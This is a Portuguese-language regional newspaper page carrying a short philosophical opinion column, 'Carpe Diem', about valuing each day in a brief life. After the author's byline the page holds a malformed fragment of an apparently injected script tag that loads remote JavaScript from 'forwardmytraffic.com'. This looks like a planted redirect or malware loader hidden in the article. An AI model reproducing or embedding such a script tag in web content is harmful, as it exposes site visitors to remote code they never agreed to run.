InícioDestaqueCarpe Diem – aproveite o seu dia

Carpe Diem – aproveite o seu dia

Últimas notícias

Danilo Dyba se apresenta no Natal em Família de Canoinhas nesta segunda-feira

O Natal em Família de Canoinhas recebe nesta segunda-feira...

Semana deve ser de temperatura baixa e pouca chuva

SEGUNDA-FEIRA (09) Na segunda-feira (09), a chuva diminui em parte...

Bombeiros atendem saída de pista na BR-280

Por volta das 14h deste domingo (08) foi registrado...

Um sábio disse com propriedade que na época atual “As pessoas nascem para estudar, estudam para trabalhar e trabalham para morrer. Estavam mortos desde o princípio.” Até pode parecer de início uma definição de vida um tanto desanimadora, triste, fúnebre. A primeira impressão é que o destino já está de certa forma traçado, pouco ou nada pode ser feito a respeito.

 

Então vamos analisar mais de perto. Existe mentira na afirmação? De modo algum. Então estamos fadados a aceitar as limitações que o destino nos oferece? De certa forma pouco se pode esperar além disso. Então é isso? Ponto final? A resposta a essas duas perguntas é a mais lógica possível: depende !

 

Ah, resposta complicadinha essa! Depende do quê? O quê pode tornar nossa rápida passagem pela terra uma existência plena e aprazível ,digna de se extinguir com méritos significativos?

 

Conforme a orientação individual de cada um muitas formas de resposta podem surgir. Religiosas, filosóficas, éticas, patrióticas (cívicas), sociais, de status quo. Que procuram se encaixar ao entendimento pré-concebido que já existem soluções prontas, basta saber onde procurar.

 

Mas a forma de simplificar as coisas é se começar pelo básico, ou seja, pela “consciência” do fato de que somos passageiros apenas nesse trem chamado vida, na qual a data de embarque já é conhecida, e a de desembarque pode acontecer a qualquer minuto, independente do destino pessoal que cada traçou para si próprio.

 

Se cada dia está sendo visto como um dia a mais, que também passe a ser visto como um dia a menos, numa contagem regressiva, temporizada num número desconhecido.

Que se pise mais no freio e menos no acelerador da vida diária, pressa pra quê?

O dia de hoje existe apenas hoje e nunca mais. Passou, passou.

Se o dia parece vir de graça, mude seu conceito e dê o valor imensurável que ele merece.

Aproveite ao máximo o dia de hoje. Carpe diem !

 

 

Nilson Sousa, Contador, Acadêmico de Direito da Unc Canoinhas…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.